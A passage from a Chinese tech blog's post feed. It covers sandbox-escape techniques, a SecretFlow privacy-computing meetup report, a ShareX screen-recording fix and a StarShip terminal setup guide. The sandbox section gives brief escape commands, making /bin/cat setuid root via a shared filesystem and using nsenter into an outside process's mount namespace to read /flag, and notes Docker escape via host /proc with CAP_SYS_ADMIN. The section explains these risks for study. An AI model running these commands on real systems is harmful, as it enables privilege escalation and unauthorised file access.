<li>IPC（系统 V IPC）</li>
<li>uts（主机名）</li>
<li>用户（UID）</li>
</ul>
<p>等。使用挂载命名空间、pivot_root可以让用户只能访问原本文件树的一部分。</p>
<h4 id="原有root挂载点未删除"><a href="#原有root挂载点未删除" class="headerlink" title="原有root挂载点未删除"></a>原有root挂载点未删除</h4><p>一般会将旧的根目录挂载到沙箱内某个挂载点，然后使用<code>pivot_root</code>将根目录换成新的“根目录”，然后再将该挂载点和目录删除。如果忘记删除原有挂载点，则沙箱形同虚设。</p>
<h4 id="共享文件系统"><a href="#共享文件系统" class="headerlink" title="共享文件系统"></a>共享文件系统</h4><p>如果沙箱和宿主共用文件系统（沙箱对文件系统有写权限），那么沙箱用户就可以利用自己的root权限来在沙箱外提取。<br>例如，在沙箱内：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">chmod</span> 4755 /bin/cat</span><br></pre></td></tr></tbody></table></figure>

<p>那么在沙箱外的任何用户就都可以以root身份运行cat，这意味着可以读取任何文件。</p>
<h4 id="先前打开的资源未关闭"><a href="#先前打开的资源未关闭" class="headerlink" title="先前打开的资源未关闭"></a>先前打开的资源未关闭</h4><p>与<code>chroot()</code>中讨论的一致。</p>
<h4 id="setns-和-x2F-proc"><a href="#setns-和-x2F-proc" class="headerlink" title="setns()和/proc"></a>setns()和/proc</h4><p><code>setns()</code>:</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">setns</span><span class="params">(<span class="type">int</span> fd, <span class="type">int</span> nstype)</span>;</span><br></pre></td></tr></tbody></table></figure>

<p><code>fd</code>参数是下列两者其中之一：</p>
<p>•   指向<code>/proc/pid/ns/</code>目录中的一个链接（或绑定挂载到此类链接）的文件描述符；</p>
<p>•  一个进程文件的句柄</p>
<p><code>nstype</code>视情况而定。</p>
<p><code>setns()</code>系统调用可以将当前进程的命名空间切换成其他进程的命名空间。</p>
<p>在bash中，可以：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">PID=149</span><br><span class="line">nsenter --mount=/proc/<span class="variable">$PID</span>/ns/mnt <span class="built_in">cat</span> /flag</span><br></pre></td></tr></tbody></table></figure>

<p>这样当前bash就会拥有和PID为149的进程一样的挂载命名空间。假如这个进程是沙箱外的，那么当前bash就有了沙箱外的挂载命名空间，意味着沙箱内用户可以访问完整的文件树。</p>
<p>也就是说，将原有的<code>/proc</code>挂载到沙箱中，且沙箱外有其他进程未关闭的情况下，是非常危险的！</p>
<h2 id="Docker"><a href="#Docker" class="headerlink" title="Docker"></a>Docker</h2><h3 id="Docker容器-vs-沙箱"><a href="#Docker容器-vs-沙箱" class="headerlink" title="Docker容器 vs 沙箱"></a>Docker容器 vs 沙箱</h3><p>Docker容器和沙箱有许多相似之处，例如：</p>
<ul>
<li><p>环境隔离</p>
<p>两者都与宿主系统产生了一定的隔离，起到了限制和保护作用</p>
</li>
<li><p>轻量</p>
<p>相比于虚拟机，两者都称得上轻量</p>
</li>
</ul>
<p>但两者是截然不同的技术：</p>
<ul>
<li><p>隔离级别：</p>
<p>Docker容器提供了一种相对较高级别的隔离，包括文件系统隔离、进程隔离、网络隔离等。容器之间通常是相互隔离的，但它们仍然在同一个操作系统内核上运行。沙箱通常提供更加细粒度的隔离，通常是为了限制单个应用程序或代码的权限。沙箱环境可以是单进程的，不涉及多个容器或应用程序的协同工作。</p>
</li>
<li><p>用途：</p>
<p>Docker容器是用于构建、打包和运行应用程序的独立、可移植的环境。它们旨在在不同的环境中一致地运行应用程序，包括开发、测试和生产环境。Docker容器通常包括应用程序及其依赖项，并提供了隔离、版本控制和自动化部署的能力。沙箱是一种安全机制，用于隔离和限制运行在其中的代码或程序的能力。沙箱旨在提供一种受限制的执行环境，以防止应用程序或代码对系统或其他应用程序造成损害。它通常用于执行不受信任的代码或对应用程序进行测试，以减少潜在的风险。</p>
</li>
<li><p>隔离技术：</p>
<p>Docker容器使用容器化技术，如Docker引擎，通过Linux命名空间、控制组等技术提供隔离和资源管理。沙箱可以使用各种技术，包括操作系统级别的虚拟化、chroot、Seccomp、AppArmor等，具体取决于实现。</p>
</li>
</ul>
<h3 id="Docker安全"><a href="#Docker安全" class="headerlink" title="Docker安全"></a>Docker安全</h3><p>除了在沙箱技术中提到的namespace, seccomp等，Docker还使用capabilities, control groups等来Linux提供的功能来提升安全性。</p>
<ol>
<li>cgroups：<ul>
<li>资源隔离：Docker使用 cgroups 来隔离容器的资源使用，包括CPU、内存、磁盘I/O等。每个容器都可以分配一定的资源配额，以确保它们不会互相干扰或抢占主机上的资源。</li>
<li>资源限制：cgroups 允许设置容器的资源限制，例如限制 CPU 使用率、内存使用量等。这有助于防止容器滥用主机上的资源，提高整个系统的稳定性。</li>
<li>资源监控：通过 cgroups，你可以监视容器的资源使用情况，以便进行性能调整和资源规划。</li>
</ul>
</li>
<li>capabilities：<ul>
<li>最小权限原则：Docker 使用 Linux 的 capabilities 功能来确保容器中的进程以最小权限原则运行。capabilities 允许我们将权限分配给进程，而不需要完全的 root 权限。这样可以减小潜在的攻击面。</li>
<li>降低特权：Docker 默认情况下会剥夺容器中的进程一些敏感的权限，如修改主机的网络配置或访问主机的设备。这有助于降低容器中运行的进程对主机的潜在威胁。</li>
</ul>
</li>
</ol>
<p>值得一提的是，如果主机 <code>/proc</code> 目录被挂载在 docker 容器中，而且容器的<code>capabilities</code>配置了 <code>CAP_SYS_ADMIN</code> （很高的权限，例如可以挂载文件系统），那么我们能够很轻松的从容器中逃逸。</p>
]]></content>
      <categories>
        <category>系统安全</category>
      </categories>
      <tags>
        <tag>沙箱</tag>
        <tag>沙箱逃逸</tag>
        <tag>Docker</tag>
      </tags>
  </entry>
  <entry>
    <title>隐语开源Meetup一周年专场与会记录</title>
    <url>/posts/secretflow-1st-meetup/</url>
    <content><![CDATA[<p><a href="https://www.secretflow.org.cn/">隐语</a>是由蚂蚁集团牵头成立的开源隐私计算框架，今天是隐语开源一周年的线下交流活动。说来惭愧，我从未给隐语贡献过一行代码。或者更具体点说，我在一周年Meetup举行前几天才从其他公众号了解到这个框架。但是本着了解前沿技术与框架、向国内大佬学习<del>（离得还算近，何不白嫖蛋糕🎂和周边）</del>的想法，我还是报名参加了此次交流会。</p>
<h2 id="什么是隐私计算？"><a href="#什么是隐私计算？" class="headerlink" title="什么是隐私计算？"></a>什么是隐私计算？</h2><p>隐语究竟是做什么的？要回答这个问题首先要知道什么是隐私计算。隐私计算的核心特征是：可用不可见。也就是说，我要根据一些数据得到一些结果，按照传统方法，我需要知道这些数据具体的内容，但是利用隐私计算技术，我在不知道这些数据的具体内容的情况下，仍然可以得到结果。举个实际的使用场景来说：医疗保险公司想要获取投保者的过往病史、住院记录等信息，于是向医院索要这些信息，但是医院为了保护患者隐私、防止患者隐私被泄露，不愿意将这些数据全部交给医疗保险公司，这时候医疗保险公司手中投保者的数据和医院手中患者的数据就都形成了数据孤岛，这些数据的部分价值无法发挥。既要保障隐私、又要发挥这些数据的价值，就需要用到隐私计算技术，比如，医院将加密后的患者数据交给医疗保险公司，医疗保险公司对密态数据进行一系列计算（无法解密）后得到结果：患者A的健康风险高、患者B的健康风险低……但是并不知道患者A的过往病史、住院记录等信息。</p>
<h2 id="隐语又是什么？"><a href="#隐语又是什么？" class="headerlink" title="隐语又是什么？"></a>隐语又是什么？</h2><p>隐语是一个开源的隐私计算框架，核心聚焦于如何丰富产业应用场景，以及如何提升隐私计算能力两个方面。</p>
<blockquote>
<h3 id="1-面向使用者"><a href="#1-面向使用者" class="headerlink" title="1.面向使用者"></a>1.面向使用者</h3><p>隐语可以提供适配于不同场景的多种解决方案，在每种解决方案之中，都可以提供安全的全链路数据处理能力，也可以针对不同业务阶段提供如快速POC、大规模、高可用的能力。</p>
<h3 id="2-面向开发者"><a href="#2-面向开发者" class="headerlink" title="2.面向开发者"></a>2.面向开发者</h3><p>针对应用系统的集成者，隐语可以提供原子化的集成能力。针对机器学习算法开发者，隐语提供接近传统机器学习算法开发的体验。针对安全协议开发者，可以提供插拨式的快速协议接入能力。</p>
</blockquote>
<p>个人的理解是，隐语框架和社区的出现是为了建设一个隐私计算学习、开发与使用的良好生态，让隐私计算能够尽快在更多产业落地，让隐私计算技术能够快速发展。当然了，在隐私计算技术还不算成熟的时期开发一个高可用的框架，势必会让该框架占有一席之地，增加蚂蚁集团在隐私计算方面的影响力与话语权。</p>
<h2 id="与会记录"><a href="#与会记录" class="headerlink" title="与会记录"></a>与会记录</h2><h3 id="会场"><a href="#会场" class="headerlink" title="会场"></a>会场</h3><p>这次见面会安排在上海科学会堂。说起来倒是我在上海这么多年第一次去上海科学会堂<del>（毕竟科学素养不够）</del>。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe1b38a067.jpg" data-fancybox="default" data-caption="上海科学会堂建筑之一"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe1b38a067.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe1b38a067.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="上海科学会堂建筑之一"></a><span class="image-caption">上海科学会堂建筑之一</span></div></div>

<p>像是民国时期的建筑，后来去搜索了下：</p>
<blockquote>
<p>该建筑原为法国总会，始建于1904年。1957年改为科技工作者活动场所。1958年，上海市科学技术协会成立，这里成为其会址。</p>
</blockquote>
<p>进会场要签到，当时在我前面的三、五人似乎是一个公司的，在我后面的看着像是研究生。好在是我看上去比实际老个几岁（在球场经常有人问我做什么工作的），倒也不显得怪异。签完到，发了本关于隐语的小册子，还给我在左臂贴了个写有“嘉宾”二字的贴纸，还挺正式的，后来才知道真正的大咖贴纸上写着“VIP”。</p>
<p>上到二楼，告诉我可以拍照留念，就拍了一张。没成想放在云相册，清晰度没我想象中高。旁边填写问卷还可以领取周边，本来走热了不想填，一听有雨伞，待会可能下雨我又没带伞，还是毛了吧🤣。问卷是关于隐语1.0体验版MVP部署包使用体验的，要填从事什么工作，一看，什么产品开发、什么算法、什么运维、什么策划，只能选其他填个学生了。填完问卷给了我一包贴纸和一把太阳伞，看着质量还不错。</p>
<p>拿着周边我就进会场了，后来才发现……错过了点心<del>——A.K.A.我的终极目标</del>。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe1fdc772d.jpeg" data-fancybox="default" data-caption="点心"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe1fdc772d.jpeg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe1fdc772d.jpeg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="点心"></a><span class="image-caption">点心</span></div></div>

<p>众所周知啊，大佬一般来得比较晚。所以我是前几个到场的，倒也好，可以挑一挑位置。最终是坐在一个靠后靠边但能看清的位置。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe1e2b3b69.jpg" data-fancybox="default" data-caption="会场内"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe1e2b3b69.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe1e2b3b69.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="会场内"></a><span class="image-caption">会场内</span></div></div>

<h3 id="大咖们"><a href="#大咖们" class="headerlink" title="大咖们"></a>大咖们</h3><p>这次Meetup来了挺多大咖，比如上海科协学术部副部长、交大教授兼期智研究院首席科学家、浙大求是讲席教授、蚂蚁副总裁兼首席技术安全官、华为可信计算首席科学家……</p>
<p>蚂蚁的韦总，他进门的时候我就觉得他应该会坐在VIP席，但绝不是教授🤣，主打的就是成功人士气质。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe194443f6.jpeg" data-fancybox="default" data-caption="韦总"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe194443f6.jpeg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe194443f6.jpeg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="韦总"></a><span class="image-caption">韦总</span></div></div>

<h3 id="用科技打造人文关怀"><a href="#用科技打造人文关怀" class="headerlink" title="用科技打造人文关怀"></a>用科技打造人文关怀</h3><p>这次的见面会讲了很多议题，但许多理念我是一知半解甚至完全不理解的。不过有一个题目非常吸引我：</p>
<blockquote>
<p>技术成果：IIFAA × 隐语：分布式认证助力视障人群线上观影</p>
</blockquote>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe15ce5854.jpeg" data-fancybox="default" data-caption="吴女士正在演讲"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe15ce5854.jpeg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe15ce5854.jpeg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="吴女士正在演讲"></a><span class="image-caption">吴女士正在演讲</span></div></div>

<p>吴女士提到一个问题：</p>
<p>我国是视障人群最多的国家。以往，视障人群想要观看院线电影需要组织线下观影活动，许多人要千里迢迢前去观影，十分不便。而倘若为他们提供线上观影服务，则又涉及到版权问题：视力无障碍人群参与其中，一定程度上达到观看常规版本院线电影的观影效果。要想解决这个问题，线上观影服务提供方就必须获取用户是否有视力障碍的信息，信息提供方则应为中国盲人协会等组织。但为保护视障群体隐私，不应当将信息直接暴露给线上观影服务提供方。</p>
<p>这时候隐私计算技术就起到了关键的作用，IIFAA利用隐语框架中的零知识证明等实现了分布式认证的功能，能让用户自己保存能证明自己具有视力障碍的凭证。在用户信息不暴露给线上观影服务方的情况下，实现了身份认证，一定程度上解决了版权问题。</p>
<p>这个议题非常打动我，因为在我看来，科技的终极目标，是为了更好的社会、更好的世界。在隐私计算发展的早期，那些走在前沿的人就不忘人文关怀，这是这个时代的荣幸。隐语社区中不仅有走在学术前沿的人、走在商业前沿的人，也有走在人文关怀中的人，这是隐语社区成长的基石。</p>
<h3 id="合影留念"><a href="#合影留念" class="headerlink" title="合影留念"></a>合影留念</h3><p>1周年其实是有生日蛋糕吃的，不过在会场外的茶歇区。与会期间一直没出过会场，等结束的时候出去一看……蛋糕没影儿哩。</p>
<p>索性回到会场和大佬们拍了一张大合照。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe13015720.jpg" data-fancybox="default" data-caption="大合照"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe13015720.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe13015720.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="大合照"></a><span class="image-caption">大合照</span></div></div>

<h3 id="生活的角落"><a href="#生活的角落" class="headerlink" title="生活的角落"></a>生活的角落</h3><p>在准备乘地铁回家的路上，在南昌路和思南路的交汇处看到这样一面墙，倒也有趣。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/22/64bbe298e717e.jpg" data-fancybox="default" data-caption="南昌路"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/22/64bbe298e717e.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/22/64bbe298e717e.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="南昌路"></a><span class="image-caption">南昌路</span></div></div>

<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>国内能够开发这样一个框架、建立这样一个社区，对国内隐私计算技术的发展是一件十足好事。事物的发展离不开培育它的土壤，这也是隐语社区抓住的最核心的理念。而国内许多行业其实都忽略了这样一个理念，大学教育更甚。若是未来能有更多这般的组织涌现、土壤的思想能够深入人心，想必中国科技的发展乃至中国的发展都会如你我所愿。</p>
]]></content>
      <categories>
        <category>前沿</category>
      </categories>
      <tags>
        <tag>隐私计算</tag>
        <tag>开源</tag>
      </tags>
  </entry>
  <entry>
    <title>如何解决ShareX录屏时光标位置发生偏移的问题</title>
    <url>/posts/sharex-cursor/</url>
    <content><![CDATA[<p>ShareX是我的主力截图工具，因为它开源且功能强大。但是实际使用时，其录屏功能会出现光标显示位置与实际位置存在偏移的问题，这十分影响使用体验，通过搜索软件仓库issues等方式，我总结了解决这一问题的方法。<span id="more"></span></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>ShareX是适用于Windows平台的一款“拥有屏幕捕捉、文件分享等功能的生产力工具”。其官网地址如下：</p>
<div class="tag link"><a class="link-card" title="ShareX - The best free and open source screenshot tool for Windows" href="https://getsharex.com/"><div class="left"><img src="https://getsharex.com/favicon.ico" class="lazyload" data-srcset="https://getsharex.com/favicon.ico" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">ShareX - The best free and open source screenshot tool for Windows</p><p class="url">https://getsharex.com/</p></div></a></div>

<p>对于我这样的博主来说，ShareX最吸引人的地方是它不仅可以满足截图需要，并且可以帮助我完成处理图片（如增加阴影和水印）、将图片上传至图床并复制链接到剪切板等一系列工作，帮助我完善了博客写作的工作流。如果有小伙伴想要上手ShareX，可以参考少数派的这篇文章：</p>
<div class="tag link"><a class="link-card" title="一个软件，满足你所有的截图需求" href="https://sspai.com/post/43937"><div class="left"><img src="https://cdn-static.sspai.com/favicon/sspai.ico" class="lazyload" data-srcset="https://cdn-static.sspai.com/favicon/sspai.ico" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">一个软件，满足你所有的截图需求</p><p class="url">https://sspai.com/post/43937</p></div></a></div>

<p>当然，没有一个软件是完美的。我使用的是写下此文时ShareX最新版本14.1，按照录屏默认配置，在使用ShareX录屏时，产生了光标位置偏移的问题：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2022/12/03/638b4ede1af75.gif" data-fancybox="default" data-caption="问题演示"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2022/12/03/638b4ede1af75.gif" class="lazyload" data-srcset="https://bu.dusays.com/2022/12/03/638b4ede1af75.gif" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="问题演示"></a><span class="image-caption">问题演示</span></div></div>

<h2 id="问题起因"><a href="#问题起因" class="headerlink" title="问题起因"></a>问题起因</h2><p>ShareX的屏幕捕捉器视频源默认使用<a href="https://github.com/rdp/screen-capture-recorder-to-video-windows-free">screen-capture-recorder</a>，在使用该视频源录屏时，对屏幕的缩放有严格要求，否则就会出现光标偏移的问题。</p>
<p>先检查你的视频源是否使用<a href="https://github.com/rdp/screen-capture-recorder-to-video-windows-free">screen-capture-recorder</a>，点击<code>动作设置-&gt;屏幕录制-&gt;屏幕录制选项</code>，若在<code>4</code>所指之处，你的选择和图中一致，那么本文所记录的解决方案应该适合你。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2022/12/03/638b48c636e40.png" data-fancybox="default" data-caption="检查"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2022/12/03/638b48c636e40.png" class="lazyload" data-srcset="https://bu.dusays.com/2022/12/03/638b48c636e40.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="检查"></a><span class="image-caption">检查</span></div></div>
<h2 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h2><p>我的电脑系统版本是Win11 22H2，在其他windows系统下的配置略有不同但大体一致。</p>
<h3 id="解决方案1（不推荐）"><a href="#解决方案1（不推荐）" class="headerlink" title="解决方案1（不推荐）"></a>解决方案1（不推荐）</h3><p>打开系统设置，找到<code>屏幕-&gt;缩放和布局-&gt;缩放</code>，更改为100%。这样做十分影响屏幕的显示效果，尤其是在大尺寸屏幕上，因此并不推荐。</p>
<h3 id="解决方案2"><a href="#解决方案2" class="headerlink" title="解决方案2"></a>解决方案2</h3><p>回到ShareX中<code>屏幕录制选项</code>界面，将视频源改为<code>GDI grab</code>。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2022/12/03/638b4990112ef.png" data-fancybox="default" data-caption="更改视频源"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2022/12/03/638b4990112ef.png" class="lazyload" data-srcset="https://bu.dusays.com/2022/12/03/638b4990112ef.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="更改视频源"></a><span class="image-caption">更改视频源</span></div></div>

<h3 id="解决方案3（推荐）"><a href="#解决方案3（推荐）" class="headerlink" title="解决方案3（推荐）"></a>解决方案3（推荐）</h3><p>找到你的ShareX安装目录，右键点击<code>ShareX.exe</code>，选择<code>属性-&gt;兼容性-&gt;更改高DPI设置</code>，勾选<code>替代高DPI缩放行为</code>，<code>缩放执行</code>选择<code>应用程序</code>。如果你使用多Windows用户，并想为所有用户解决这个问题，请点击图示第4步下方的<code>更改所有用户的设置</code>，并进行相应的设置。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2022/12/03/638b4a0a3b26d.png" data-fancybox="default" data-caption="属性配置"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2022/12/03/638b4a0a3b26d.png" class="lazyload" data-srcset="https://bu.dusays.com/2022/12/03/638b4a0a3b26d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="属性配置"></a><span class="image-caption">属性配置</span></div></div>

<h2 id="3种方案对比"><a href="#3种方案对比" class="headerlink" title="3种方案对比"></a>3种方案对比</h2><ul>
<li>方案1<br>很大程度地影响屏幕显示、影响日常使用</li>
<li>方案2<br>可以很好地解决问题，但是录制效果不如方案3，录制过程中光标偶有闪烁</li>
<li>方案3<br>不更改原本的屏幕缩放比例，录制效果好</li>
</ul>
]]></content>
      <categories>
        <category>软件</category>
      </categories>
      <tags>
        <tag>杂七杂八</tag>
        <tag>ShareX</tag>
      </tags>
  </entry>
  <entry>
    <title>终端自定义——StarShip</title>
    <url>/posts/shell-customize/</url>
    <content><![CDATA[<p>一个好看且好用的终端<del>或许</del>是生产力的保障。之前折腾终端的时候也试了很多方法，比如换成zsh、fish等，还有实适用于bash的OhMySH项目（不是zsh）……其实都挺不错的，但是有一个问题——速度比不加任何插件的bash慢一些。机缘巧合下，发现了StarShip项目，速度显然更快，因此撰写此文分享、记录。Ubuntu + bash用户可以完全参照此文。<span id="more"></span></p>
<p>先贴出我的终端：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/07/29/64c4ffaa041d6.png" data-fancybox="default" data-caption="shell"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/07/29/64c4ffaa041d6.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/07/29/64c4ffaa041d6.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="shell"></a><span class="image-caption">shell</span></div></div>

<h2 id="StarShip介绍"><a href="#StarShip介绍" class="headerlink" title="StarShip介绍"></a>StarShip介绍</h2><p>StarShip是一个Rust写的终端提示符工具，启动速度很快。官方的介绍如下：</p>
<blockquote>
<p><strong>轻量、迅速、可无限定制的高颜值终端！</strong></p>
<ul>
<li><strong>快：</strong> 很快 —— 真的真的非常快！ 🚀</li>
<li><strong>定制化：</strong> 可定制各种各样的提示符。</li>
<li><strong>通用：</strong> 适用于任何 Shell、任何操作系统。</li>
<li><strong>智能：</strong> 一目了然地显示相关信息。</li>
<li><strong>功能丰富：</strong> 支持所有你喜欢的工具。</li>
<li><strong>易用：</strong> 安装快速 —— 几分钟就可上手。</li>
</ul>
</blockquote>
<p>因此我不用安装其他终端就可以用，而且实测几乎没有感受到拖慢bash启动速度。</p>
<h2 id="安装并启用字体"><a href="#安装并启用字体" class="headerlink" title="安装并启用字体"></a>安装并启用字体</h2><p>使用StarShip的前置要求是：安装并在终端启用 <a href="https://www.nerdfonts.com/">Nerd Font </a>字体，如 Fira Code Nerd Font。</p>
<p>这里就以Fira Code Nerd Font、ubuntu22.04为例。</p>
<h3 id="安装字体"><a href="#安装字体" class="headerlink" title="安装字体"></a>安装字体</h3><div class="btns rounded center grid1">
            <a class="button" href="https://github.com/ryanoasis/nerd-fonts/releases/download/v3.0.2/FiraCode.zip" title="下载字体"><i class="fas fa-download"></i>下载字体</a>
          </div>

<p>下载并解压完成后，选择一种或者几种，双击后点击右上角的install/安装，即可安装字体。</p>
<h3 id="启用字体"><a href="#启用字体" class="headerlink" title="启用字体"></a>启用字体</h3><p>接下来需要在终端启用字体：</p>
<ol>
<li>点击右上角的菜单（三根横线）</li>
<li>点击Preferences</li>
<li>点击Unnamed</li>
<li>勾选启用Custom font</li>
<li>点击旁边的选项卡，搜索Nerd，选择一个包含<code>Nerd Font</code>的字体</li>
</ol>
<p>选择完成后，立即生效。</p>
<h2 id="安装StarShip"><a href="#安装StarShip" class="headerlink" title="安装StarShip"></a>安装StarShip</h2><p>以Linux为例：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">curl -sS https://starship.rs/install.sh | sh</span><br></pre></td></tr></tbody></table></figure>

<p>其他操作系统可参照<a href="https://starship.rs/zh-CN/guide/#%E6%AD%A5%E9%AA%A4-1-%E5%AE%89%E8%A3%85-starship">官方文档</a></p>
<h2 id="启用StarShip"><a href="#启用StarShip" class="headerlink" title="启用StarShip"></a>启用StarShip</h2><p>以bash为例：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">open ~/.bashrc</span><br></pre></td></tr></tbody></table></figure>

<p>在末尾添加：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">eval "$(starship init bash)"</span><br></pre></td></tr></tbody></table></figure>

<p>在终端执行：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">source ~/.bashrc</span><br></pre></td></tr></tbody></table></figure>

<p>其他终端，如cmd、zsh等可以参照<a href="https://starship.rs/zh-CN/guide/#%E6%AD%A5%E9%AA%A4-2-set-up-your-shell-to-use-starship">官方文档</a></p>
<h2 id="提升颜值"><a href="#提升颜值" class="headerlink" title="提升颜值"></a>提升颜值</h2><p>StarShip可以自行定制样式，可以参照<a href="https://starship.rs/zh-CN/config/">官方文档</a></p>
<p>对于绝大多数用户来说，可以使用社区提供的预设：<a href="https://starship.rs/zh-CN/presets/">社区配置分享</a></p>
<p>我使用的是<a href="https://starship.rs/zh-CN/presets/#tokyo-night">Tokyo Night</a>预设，但是做了稍许修改：</p>
<ol>
<li>将Apple图标改成Linux</li>
<li>添加用户名的显示</li>
</ol>
<p>如果想直接使用Tokyo Night预设，可以在终端执行以下命令：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">starship preset tokyo-night -o ~/.config/starship.toml</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li><p>如果想在此基础上将Apple图标改成Linux：</p>
<p>前往<a href="https://www.nerdfonts.com/cheat-sheet">Nerd Fonts官网</a>，搜索<code>https://www.nerdfonts.com/cheat-sheet</code>，复制icon。</p>
